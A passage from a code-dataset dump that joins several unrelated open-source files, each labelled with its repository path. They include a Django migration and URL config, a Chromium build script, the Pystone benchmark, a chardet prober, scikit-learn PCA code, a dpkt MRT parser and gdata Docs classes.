'currency': ('django.db.models.fields.CharField', [], {'default': "'usd'", 'max_length': '8'}),
'fulfilled_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'line_desc': ('django.db.models.fields.CharField', [], {'default': "'Misc. Item'", 'max_length': '1024'}),
'list_price': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '30', 'decimal_places': '2'}),
'modified': ('model_utils.fields.AutoLastModifiedField', [], {'default': 'datetime.datetime.now'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Order']"}),
'qty': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'refund_requested_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'report_comments': ('django.db.models.fields.TextField', [], {'default': "''"}),
'service_fee': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '30', 'decimal_places': '2'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'cart'", 'max_length': '32', 'db_index': 'True'}),
'unit_cost': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '30', 'decimal_places': '2'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'shoppingcart.paidcourseregistration': {
'Meta': {'object_name': 'PaidCourseRegistration', '_ormbases': ['shoppingcart.OrderItem']},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '128', 'db_index': 'True'}),
'mode': ('django.db.models.fields.SlugField', [], {'default': "'honor'", 'max_length': '50'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'shoppingcart.paidcourseregistrationannotation': {
'Meta': {'object_name': 'PaidCourseRegistrationAnnotation'},
'annotation': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'unique': 'True', 'max_length': '128', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'shoppingcart.registrationcoderedemption': {
'Meta': {'object_name': 'RegistrationCodeRedemption'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Order']", 'null': 'True'}),
'redeemed_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2014, 11, 6, 0, 0)', 'null': 'True'}),
'redeemed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'registration_code': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.CourseRegistrationCode']"})
},
'student.courseenrollment': {
'Meta': {'ordering': "('user', 'course_id')", 'unique_together': "(('user', 'course_id'),)", 'object_name': 'CourseEnrollment'},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'mode': ('django.db.models.fields.CharField', [], {'default': "'honor'", 'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['shoppingcart']
|
htlcnn/pyrevitscripts | refs/heads/master | HTL.tab/Test.panel/Test.pushbutton/keyman/keyman/keyman/urls.py | 1 | """keyman URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', admin.site.urls),
]
|
lihui7115/ChromiumGStreamerBackend | refs/heads/master | build/android/gyp/pack_relocations.py | 34 | #!/usr/bin/env python
#
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Pack relocations in a library (or copy unchanged).
If --enable-packing and --configuration-name=='Release', invoke the
relocation_packer tool to pack the .rel.dyn or .rela.dyn section in the given
library files. This step is inserted after the libraries are stripped.
If --enable-packing is zero, the script copies files verbatim, with no
attempt to pack relocations.
Any library listed in --exclude-packing-list is also copied verbatim,
irrespective of any --enable-packing setting. Typically this would be
'libchromium_android_linker.so'.
"""
import optparse
import os
import shlex
import shutil
import sys
import tempfile
from util import build_utils
def PackLibraryRelocations(android_pack_relocations, library_path, output_path):
shutil.copy(library_path, output_path)
pack_command = [android_pack_relocations, output_path]
build_utils.CheckOutput(pack_command)
def CopyLibraryUnchanged(library_path, output_path):
shutil.copy(library_path, output_path)
def main(args):
args = build_utils.ExpandFileArgs(args)
parser = optparse.OptionParser()
build_utils.AddDepfileOption(parser)
parser.add_option('--clear-dir', action='store_true',
help='If set, the destination directory will be deleted '
'before copying files to it. This is highly recommended to '
'ensure that no stale files are left in the directory.')
parser.add_option('--configuration-name',
default='Release',
help='Gyp configuration name (i.e. Debug, Release)')
parser.add_option('--enable-packing',
choices=['0', '1'],
help=('Pack relocations if 1 and configuration name is \'Release\','
' otherwise plain file copy'))
parser.add_option('--exclude-packing-list',
default='',
help='Names of any libraries explicitly not packed')
parser.add_option('--android-pack-relocations',
help='Path to the relocations packer binary')
parser.add_option('--stripped-libraries-dir',
help='Directory for stripped libraries')
parser.add_option('--packed-libraries-dir',
help='Directory for packed libraries')
parser.add_option('--libraries', action='append',
help='List of libraries')
parser.add_option('--stamp', help='Path to touch on success')
options, _ = parser.parse_args(args)
enable_packing = (options.enable_packing == '1' and
options.configuration_name == 'Release')
exclude_packing_set = set(shlex.split(options.exclude_packing_list))
libraries = []
for libs_arg in options.libraries:
libraries += build_utils.ParseGypList(libs_arg)
if options.clear_dir:
build_utils.DeleteDirectory(options.packed_libraries_dir)
build_utils.MakeDirectory(options.packed_libraries_dir)
for library in libraries:
library_path = os.path.join(options.stripped_libraries_dir, library)
output_path = os.path.join(
options.packed_libraries_dir, os.path.basename(library))
if enable_packing and library not in exclude_packing_set:
PackLibraryRelocations(options.android_pack_relocations,
library_path,
output_path)
else:
CopyLibraryUnchanged(library_path, output_path)
if options.depfile:
build_utils.WriteDepfile(
options.depfile,
libraries + build_utils.GetPythonDependencies())
if options.stamp:
build_utils.Touch(options.stamp)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
noam09/deluge-telegramer | refs/heads/master | telegramer/include/future/backports/test/pystone.py | 80 | #!/usr/bin/env python3
"""
"PYSTONE" Benchmark Program
Version: Python/1.1 (corresponds to C/1.1 plus 2 Pystone fixes)
Author: Reinhold P. Weicker, CACM Vol 27, No 10, 10/84 pg. 1013.
Translated from ADA to C by Rick Richardson.
Every method to preserve ADA-likeness has been used,
at the expense of C-ness.
Translated from C to Python by Guido van Rossum.
Version History:
Version 1.1 corrects two bugs in version 1.0:
First, it leaked memory: in Proc1(), NextRecord ends
up having a pointer to itself. I have corrected this
by zapping NextRecord.PtrComp at the end of Proc1().
Second, Proc3() used the operator != to compare a
record to None. This is rather inefficient and not
true to the intention of the original benchmark (where
a pointer comparison to None is intended; the !=
operator attempts to find a method __cmp__ to do value
comparison of the record). Version 1.1 runs 5-10
percent faster than version 1.0, so benchmark figures
of different versions can't be compared directly.
"""
from __future__ import print_function
from time import clock
LOOPS = 50000
__version__ = "1.1"
[Ident1, Ident2, Ident3, Ident4, Ident5] = range(1, 6)
class Record(object):
def __init__(self, PtrComp = None, Discr = 0, EnumComp = 0,
IntComp = 0, StringComp = 0):
self.PtrComp = PtrComp
self.Discr = Discr
self.EnumComp = EnumComp
self.IntComp = IntComp
self.StringComp = StringComp
def copy(self):
return Record(self.PtrComp, self.Discr, self.EnumComp,
self.IntComp, self.StringComp)
TRUE = 1
FALSE = 0
def main(loops=LOOPS):
benchtime, stones = pystones(loops)
print("Pystone(%s) time for %d passes = %g" % \
(__version__, loops, benchtime))
print("This machine benchmarks at %g pystones/second" % stones)
def pystones(loops=LOOPS):
return Proc0(loops)
IntGlob = 0
BoolGlob = FALSE
Char1Glob = '\0'
Char2Glob = '\0'
Array1Glob = [0]*51
Array2Glob = [x[:] for x in [Array1Glob]*51]
PtrGlb = None
PtrGlbNext = None
def Proc0(loops=LOOPS):
global IntGlob
global BoolGlob
global Char1Glob
global Char2Glob
global Array1Glob
global Array2Glob
global PtrGlb
global PtrGlbNext
starttime = clock()
for i in range(loops):
pass
nulltime = clock() - starttime
PtrGlbNext = Record()
PtrGlb = Record()
PtrGlb.PtrComp = PtrGlbNext
PtrGlb.Discr = Ident1
PtrGlb.EnumComp = Ident3
PtrGlb.IntComp = 40
PtrGlb.StringComp = "DHRYSTONE PROGRAM, SOME STRING"
String1Loc = "DHRYSTONE PROGRAM, 1'ST STRING"
Array2Glob[8][7] = 10
starttime = clock()
for i in range(loops):
Proc5()
Proc4()
IntLoc1 = 2
IntLoc2 = 3
String2Loc = "DHRYSTONE PROGRAM, 2'ND STRING"
EnumLoc = Ident2
BoolGlob = not Func2(String1Loc, String2Loc)
while IntLoc1 < IntLoc2:
IntLoc3 = 5 * IntLoc1 - IntLoc2
IntLoc3 = Proc7(IntLoc1, IntLoc2)
IntLoc1 = IntLoc1 + 1
Proc8(Array1Glob, Array2Glob, IntLoc1, IntLoc3)
PtrGlb = Proc1(PtrGlb)
CharIndex = 'A'
while CharIndex <= Char2Glob:
if EnumLoc == Func1(CharIndex, 'C'):
EnumLoc = Proc6(Ident1)
CharIndex = chr(ord(CharIndex)+1)
IntLoc3 = IntLoc2 * IntLoc1
IntLoc2 = IntLoc3 / IntLoc1
IntLoc2 = 7 * (IntLoc3 - IntLoc2) - IntLoc1
IntLoc1 = Proc2(IntLoc1)
benchtime = clock() - starttime - nulltime
if benchtime == 0.0:
loopsPerBenchtime = 0.0
else:
loopsPerBenchtime = (loops / benchtime)
return benchtime, loopsPerBenchtime
def Proc1(PtrParIn):
PtrParIn.PtrComp = NextRecord = PtrGlb.copy()
PtrParIn.IntComp = 5
NextRecord.IntComp = PtrParIn.IntComp
NextRecord.PtrComp = PtrParIn.PtrComp
NextRecord.PtrComp = Proc3(NextRecord.PtrComp)
if NextRecord.Discr == Ident1:
NextRecord.IntComp = 6
NextRecord.EnumComp = Proc6(PtrParIn.EnumComp)
NextRecord.PtrComp = PtrGlb.PtrComp
NextRecord.IntComp = Proc7(NextRecord.IntComp, 10)
else:
PtrParIn = NextRecord.copy()
NextRecord.PtrComp = None
return PtrParIn
def Proc2(IntParIO):
IntLoc = IntParIO + 10
while 1:
if Char1Glob == 'A':
IntLoc = IntLoc - 1
IntParIO = IntLoc - IntGlob
EnumLoc = Ident1
if EnumLoc == Ident1:
break
return IntParIO
def Proc3(PtrParOut):
global IntGlob
if PtrGlb is not None:
PtrParOut = PtrGlb.PtrComp
else:
IntGlob = 100
PtrGlb.IntComp = Proc7(10, IntGlob)
return PtrParOut
def Proc4():
global Char2Glob
BoolLoc = Char1Glob == 'A'
BoolLoc = BoolLoc or BoolGlob
Char2Glob = 'B'
def Proc5():
global Char1Glob
global BoolGlob
Char1Glob = 'A'
BoolGlob = FALSE
def Proc6(EnumParIn):
EnumParOut = EnumParIn
if not Func3(EnumParIn):
EnumParOut = Ident4
if EnumParIn == Ident1:
EnumParOut = Ident1
elif EnumParIn == Ident2:
if IntGlob > 100:
EnumParOut = Ident1
else:
EnumParOut = Ident4
elif EnumParIn == Ident3:
EnumParOut = Ident2
elif EnumParIn == Ident4:
pass
elif EnumParIn == Ident5:
EnumParOut = Ident3
return EnumParOut
def Proc7(IntParI1, IntParI2):
IntLoc = IntParI1 + 2
IntParOut = IntParI2 + IntLoc
return IntParOut
def Proc8(Array1Par, Array2Par, IntParI1, IntParI2):
global IntGlob
IntLoc = IntParI1 + 5
Array1Par[IntLoc] = IntParI2
Array1Par[IntLoc+1] = Array1Par[IntLoc]
Array1Par[IntLoc+30] = IntLoc
for IntIndex in range(IntLoc, IntLoc+2):
Array2Par[IntLoc][IntIndex] = IntLoc
Array2Par[IntLoc][IntLoc-1] = Array2Par[IntLoc][IntLoc-1] + 1
Array2Par[IntLoc+20][IntLoc] = Array1Par[IntLoc]
IntGlob = 5
def Func1(CharPar1, CharPar2):
CharLoc1 = CharPar1
CharLoc2 = CharLoc1
if CharLoc2 != CharPar2:
return Ident1
else:
return Ident2
def Func2(StrParI1, StrParI2):
IntLoc = 1
while IntLoc <= 1:
if Func1(StrParI1[IntLoc], StrParI2[IntLoc+1]) == Ident1:
CharLoc = 'A'
IntLoc = IntLoc + 1
if CharLoc >= 'W' and CharLoc <= 'Z':
IntLoc = 7
if CharLoc == 'X':
return TRUE
else:
if StrParI1 > StrParI2:
IntLoc = IntLoc + 7
return TRUE
else:
return FALSE
def Func3(EnumParIn):
EnumLoc = EnumParIn
if EnumLoc == Ident3: return TRUE
return FALSE
if __name__ == '__main__':
import sys
def error(msg):
print(msg, end=' ', file=sys.stderr)
print("usage: %s [number_of_loops]" % sys.argv[0], file=sys.stderr)
sys.exit(100)
nargs = len(sys.argv) - 1
if nargs > 1:
error("%d arguments are too many;" % nargs)
elif nargs == 1:
try: loops = int(sys.argv[1])
except ValueError:
error("Invalid argument %r;" % sys.argv[1])
else:
loops = LOOPS
main(loops)
|
Endika/sale-workflow | refs/heads/8.0 | sale_pricelist_discount/__init__.py | 15 | ##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2015 credativ ltd (<http://www.credativ.co.uk>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from . import model
|
stevehof/CouchPotatoServer | refs/heads/master | libs/chardet/mbcsgroupprober.py | 236 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
# Proofpoint, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from charsetgroupprober import CharSetGroupProber
from utf8prober import UTF8Prober
from sjisprober import SJISProber
from eucjpprober import EUCJPProber
from gb2312prober import GB2312Prober
from euckrprober import EUCKRProber
from big5prober import Big5Prober
from euctwprober import EUCTWProber
class MBCSGroupProber(CharSetGroupProber):
def __init__(self):
CharSetGroupProber.__init__(self)
self._mProbers = [ \
UTF8Prober(),
SJISProber(),
EUCJPProber(),
GB2312Prober(),
EUCKRProber(),
Big5Prober(),
EUCTWProber()]
self.reset()
|
julzhk/simple_api | refs/heads/master | test_api_using_numpy.py | 1 | import unittest
import numpy as np
import datetime
COLUMN_LABELS = ['Name', 'Value', 'TimeStamp']
def str2datetime(s):
return datetime.datetime.strptime(s[:19], "%Y-%m-%d %I:%M:%S")
class TestAPIFunctions(unittest.TestCase):
def setUp(self):
self.df = np.loadtxt('test_dataset.csv',
skiprows=1,
dtype={'names': COLUMN_LABELS,
'formats': ['S8','I8','S19']},
delimiter=',')
def test_simple_numpy(self):
self.assertEqual( self.df[0][0],'name1')
self.assertEqual( self.df[0][1],1)
self.assertEqual( self.df[1][0],'name2')
self.assertEqual( self.df[1][1],2)
def test_dates(self):
testdate = str2datetime(self.df[0][2])
self.assertEqual(testdate,
datetime.datetime.strptime(
'2013-07-19 08:47:00', "%Y-%m-%d %I:%M:%S")
)
def test_one_where_clause(self):
r = np.where(self.df['TimeStamp'] > '2013-07-22 09:48')
print [self.df[i] for i in r]
if __name__ == '__main__':
unittest.main() |
kashif/scikit-learn | refs/heads/master | sklearn/decomposition/base.py | 313 | """Principal Component Analysis Base Classes"""
# Author: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Olivier Grisel <olivier.grisel@ensta.org>
# Mathieu Blondel <mathieu@mblondel.org>
# Denis A. Engemann <d.engemann@fz-juelich.de>
# Kyle Kastner <kastnerkyle@gmail.com>
#
# License: BSD 3 clause
import numpy as np
from scipy import linalg
from ..base import BaseEstimator, TransformerMixin
from ..utils import check_array
from ..utils.extmath import fast_dot
from ..utils.validation import check_is_fitted
from ..externals import six
from abc import ABCMeta, abstractmethod
class _BasePCA(six.with_metaclass(ABCMeta, BaseEstimator, TransformerMixin)):
"""Base class for PCA methods.
Warning: This class should not be used directly.
Use derived classes instead.
"""
def get_covariance(self):
"""Compute data covariance with the generative model.
``cov = components_.T * S**2 * components_ + sigma2 * eye(n_features)``
where S**2 contains the explained variances, and sigma2 contains the
noise variances.
Returns
-------
cov : array, shape=(n_features, n_features)
Estimated covariance of data.
"""
components_ = self.components_
exp_var = self.explained_variance_
if self.whiten:
components_ = components_ * np.sqrt(exp_var[:, np.newaxis])
exp_var_diff = np.maximum(exp_var - self.noise_variance_, 0.)
cov = np.dot(components_.T * exp_var_diff, components_)
cov.flat[::len(cov) + 1] += self.noise_variance_ # modify diag inplace
return cov
def get_precision(self):
"""Compute data precision matrix with the generative model.
Equals the inverse of the covariance but computed with
the matrix inversion lemma for efficiency.
Returns
-------
precision : array, shape=(n_features, n_features)
Estimated precision of data.
"""
n_features = self.components_.shape[1]
# handle corner cases first
if self.n_components_ == 0:
return np.eye(n_features) / self.noise_variance_
if self.n_components_ == n_features:
return linalg.inv(self.get_covariance())
# Get precision using matrix inversion lemma
components_ = self.components_
exp_var = self.explained_variance_
if self.whiten:
components_ = components_ * np.sqrt(exp_var[:, np.newaxis])
exp_var_diff = np.maximum(exp_var - self.noise_variance_, 0.)
precision = np.dot(components_, components_.T) / self.noise_variance_
precision.flat[::len(precision) + 1] += 1. / exp_var_diff
precision = np.dot(components_.T,
np.dot(linalg.inv(precision), components_))
precision /= -(self.noise_variance_ ** 2)
precision.flat[::len(precision) + 1] += 1. / self.noise_variance_
return precision
@abstractmethod
def fit(X, y=None):
"""Placeholder for fit. Subclasses should implement this method!
Fit the model with X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data, where n_samples is the number of samples and
n_features is the number of features.
Returns
-------
self : object
Returns the instance itself.
"""
def transform(self, X, y=None):
"""Apply dimensionality reduction to X.
X is projected on the first principal components previously extracted
from a training set.
Parameters
----------
X : array-like, shape (n_samples, n_features)
New data, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
Examples
--------
>>> import numpy as np
>>> from sklearn.decomposition import IncrementalPCA
>>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
>>> ipca = IncrementalPCA(n_components=2, batch_size=3)
>>> ipca.fit(X)
IncrementalPCA(batch_size=3, copy=True, n_components=2, whiten=False)
>>> ipca.transform(X) # doctest: +SKIP
"""
check_is_fitted(self, ['mean_', 'components_'], all_or_any=all)
X = check_array(X)
if self.mean_ is not None:
X = X - self.mean_
X_transformed = fast_dot(X, self.components_.T)
if self.whiten:
X_transformed /= np.sqrt(self.explained_variance_)
return X_transformed
def inverse_transform(self, X, y=None):
"""Transform data back to its original space.
In other words, return an input X_original whose transform would be X.
Parameters
----------
X : array-like, shape (n_samples, n_components)
New data, where n_samples is the number of samples
and n_components is the number of components.
Returns
-------
X_original array-like, shape (n_samples, n_features)
Notes
-----
If whitening is enabled, inverse_transform will compute the
exact inverse operation, which includes reversing whitening.
"""
if self.whiten:
return fast_dot(X, np.sqrt(self.explained_variance_[:, np.newaxis]) *
self.components_) + self.mean_
else:
return fast_dot(X, self.components_) + self.mean_
|
zhakui/QMarkdowner | refs/heads/master | dpkt/mrt.py | 15 | # $Id: mrt.py 29 2007-01-26 02:29:07Z jon.oberheide $
"""Multi-threaded Routing Toolkit."""
import dpkt
import bgp
# Multi-threaded Routing Toolkit
# http://www.ietf.org/internet-drafts/draft-ietf-grow-mrt-03.txt
# MRT Types
NULL = 0
START = 1
DIE = 2
I_AM_DEAD = 3
PEER_DOWN = 4
BGP = 5 # Deprecated by BGP4MP
RIP = 6
IDRP = 7
RIPNG = 8
BGP4PLUS = 9 # Deprecated by BGP4MP
BGP4PLUS_01 = 10 # Deprecated by BGP4MP
OSPF = 11
TABLE_DUMP = 12
BGP4MP = 16
BGP4MP_ET = 17
ISIS = 32
ISIS_ET = 33
OSPF_ET = 64
# BGP4MP Subtypes
BGP4MP_STATE_CHANGE = 0
BGP4MP_MESSAGE = 1
BGP4MP_ENTRY = 2
BGP4MP_SNAPSHOT = 3
BGP4MP_MESSAGE_32BIT_AS = 4
# Address Family Types
AFI_IPv4 = 1
AFI_IPv6 = 2
class MRTHeader(dpkt.Packet):
__hdr__ = (
('ts', 'I', 0),
('type', 'H', 0),
('subtype', 'H', 0),
('len', 'I', 0)
)
class TableDump(dpkt.Packet):
__hdr__ = (
('view', 'H', 0),
('seq', 'H', 0),
('prefix', 'I', 0),
('prefix_len', 'B', 0),
('status', 'B', 1),
('originated_ts', 'I', 0),
('peer_ip', 'I', 0),
('peer_as', 'H', 0),
('attr_len', 'H', 0)
)
def unpack(self, buf):
dpkt.Packet.unpack(self, buf)
plen = self.attr_len
l = []
while plen > 0:
attr = bgp.BGP.Update.Attribute(self.data)
self.data = self.data[len(attr):]
plen -= len(attr)
l.append(attr)
self.attributes = l
class BGP4MPMessage(dpkt.Packet):
__hdr__ = (
('src_as', 'H', 0),
('dst_as', 'H', 0),
('intf', 'H', 0),
('family', 'H', AFI_IPv4),
('src_ip', 'I', 0),
('dst_ip', 'I', 0)
)
class BGP4MPMessage_32(dpkt.Packet):
__hdr__ = (
('src_as', 'I', 0),
('dst_as', 'I', 0),
('intf', 'H', 0),
('family', 'H', AFI_IPv4),
('src_ip', 'I', 0),
('dst_ip', 'I', 0)
)
|
denisff/python-for-android | refs/heads/master | python-build/python-libs/gdata/build/lib/gdata/docs/__init__.py | 263 | #!/usr/bin/python
#
# Copyright 2009 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains extensions to Atom objects used with Google Documents."""
__author__ = ('api.jfisher (Jeff Fisher), '
'api.eric@google.com (Eric Bidelman)')
import atom
import gdata
DOCUMENTS_NAMESPACE = 'http://schemas.google.com/docs/2007'
class Scope(atom.AtomBase):
"""The DocList ACL scope element"""
_tag = 'scope'
_namespace = gdata.GACL_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
_attributes['value'] = 'value'
_attributes['type'] = 'type'
def __init__(self, value=None, type=None, extension_elements=None,
extension_attributes=None, text=None):
self.value = value
self.type = type
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
class Role(atom.AtomBase):
"""The DocList ACL role element"""
_tag = 'role'
_namespace = gdata.GACL_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
_attributes['value'] = 'value'
def __init__(self, value=None, extension_elements=None,
extension_attributes=None, text=None):
self.value = value
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
class FeedLink(atom.AtomBase):
"""The DocList gd:feedLink element"""
_tag = 'feedLink'
_namespace = gdata.GDATA_NAMESPACE
_attributes = atom.AtomBase._attributes.copy()
_attributes['rel'] = 'rel'
_attributes['href'] = 'href'
def __init__(self, href=None, rel=None, text=None, extension_elements=None,
extension_attributes=None):
self.href = href
self.rel = rel
atom.AtomBase.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes, text=text)
class ResourceId(atom.AtomBase):
"""The DocList gd:resourceId element"""
_tag = 'resourceId'
_namespace = gdata.GDATA_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
_attributes['value'] = 'value'
def __init__(self, value=None, extension_elements=None,
extension_attributes=None, text=None):
self.value = value
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
class LastModifiedBy(atom.Person):
"""The DocList gd:lastModifiedBy element"""
_tag = 'lastModifiedBy'
_namespace = gdata.GDATA_NAMESPACE
class LastViewed(atom.Person):
"""The DocList gd:lastViewed element"""
_tag = 'lastViewed'
_namespace = gdata.GDATA_NAMESPACE
class WritersCanInvite(atom.AtomBase):
"""The DocList docs:writersCanInvite element"""
_tag = 'writersCanInvite'
_namespace = DOCUMENTS_NAMESPACE
_attributes = atom.AtomBase._attributes.copy()
_attributes['value'] = 'value'
class DocumentListEntry(gdata.GDataEntry):
"""The Google Documents version of an Atom Entry"""
_tag = gdata.GDataEntry._tag
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataEntry._children.copy()
_attributes = gdata.GDataEntry._attributes.copy()
_children['{%s}feedLink' % gdata.GDATA_NAMESPACE] = ('feedLink', FeedLink)
_children['{%s}resourceId' % gdata.GDATA_NAMESPACE] = ('resourceId',
ResourceId)
_children['{%s}lastModifiedBy' % gdata.GDATA_NAMESPACE] = ('lastModifiedBy',
LastModifiedBy)
_children['{%s}lastViewed' % gdata.GDATA_NAMESPACE] = ('lastViewed',
LastViewed)
_children['{%s}writersCanInvite' % DOCUMENTS_NAMESPACE] = (
'writersCanInvite', WritersCanInvite)
def __init__(self, resourceId=None, feedLink=None, lastViewed=None,
lastModifiedBy=None, writersCanInvite=None, author=None,
category=None, content=None, atom_id=None, link=None,
published=None, title=None, updated=None, text=None,
extension_elements=None, extension_attributes=None):
self.feedLink = feedLink
self.lastViewed = lastViewed
self.lastModifiedBy = lastModifiedBy
self.resourceId = resourceId
self.writersCanInvite = writersCanInvite
gdata.GDataEntry.__init__(
self, author=author, category=category, content=content,
atom_id=atom_id, link=link, published=published, title=title,
updated=updated, extension_elements=extension_elements,
extension_attributes=extension_attributes, text=text)
def GetAclLink(self):
"""Extracts the DocListEntry's <gd:feedLink>.
Returns:
A FeedLink object.
"""
return self.feedLink
def GetDocumentType(self):
"""Extracts the type of document from the DocListEntry.
This method returns the type of document the DocListEntry
represents. Possible values are document, presentation,
spreadsheet, folder, or pdf.
Returns:
A string representing the type of document.
"""
if self.category:
for category in self.category:
if category.scheme == gdata.GDATA_NAMESPACE + '#kind':
return category.label
else:
return None
def DocumentListEntryFromString(xml_string):
"""Converts an XML string into a DocumentListEntry object.
Args:
xml_string: string The XML describing a Document List feed entry.
Returns:
A DocumentListEntry object corresponding to the given XML.
"""
return atom.CreateClassFromXMLString(DocumentListEntry, xml_string)
class DocumentListAclEntry(gdata.GDataEntry):
"""A DocList ACL Entry flavor of an Atom Entry"""
_tag = gdata.GDataEntry._tag
_namespace = gdata.GDataEntry._namespace
_children = gdata.GDataEntry._children.copy()
_attributes = gdata.GDataEntry._attributes.copy()
_children['{%s}scope' % gdata.GACL_NAMESPACE] = ('scope', Scope)
_children['{%s}role' % gdata.GACL_NAMESPACE] = ('role', Role)
def __init__(self, category=None, atom_id=None, link=None,
title=None, updated=None, scope=None, role=None,
extension_elements=None, extension_attributes=None, text=None):
gdata.GDataEntry.__init__(self, author=None, category=category,
content=None, atom_id=atom_id, link=link,
published=None, title=title,
updated=updated, text=None)
self.scope = scope
self.role = role
def DocumentListAclEntryFromString(xml_string):
"""Converts an XML string into a DocumentListAclEntry object.
Args:
xml_string: string The XML describing a Document List ACL feed entry.
Returns:
A DocumentListAclEntry object corresponding to the given XML.
"""
return atom.CreateClassFromXMLString(DocumentListAclEntry, xml_string)
class DocumentListFeed(gdata.GDataFeed):
"""A feed containing a list of Google Documents Items"""
_tag = gdata.GDataFeed._tag
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataFeed._children.copy()
_attributes = gdata.GDataFeed._attributes.copy()
_children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry',
[DocumentListEntry])
def DocumentListFeedFromString(xml_string):
"""Converts an XML string into a DocumentListFeed object.
Args:
xml_string: string The XML describing a DocumentList feed.
Returns:
A DocumentListFeed object corresponding to the given XML.
"""
return atom.CreateClassFromXMLString(DocumentListFeed, xml_string)
class DocumentListAclFeed(gdata.GDataFeed):
"""A DocList ACL feed flavor of a Atom feed"""
_tag = gdata.GDataFeed._tag
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataFeed._children.copy()
_attributes = gdata.GDataFeed._attributes.copy()
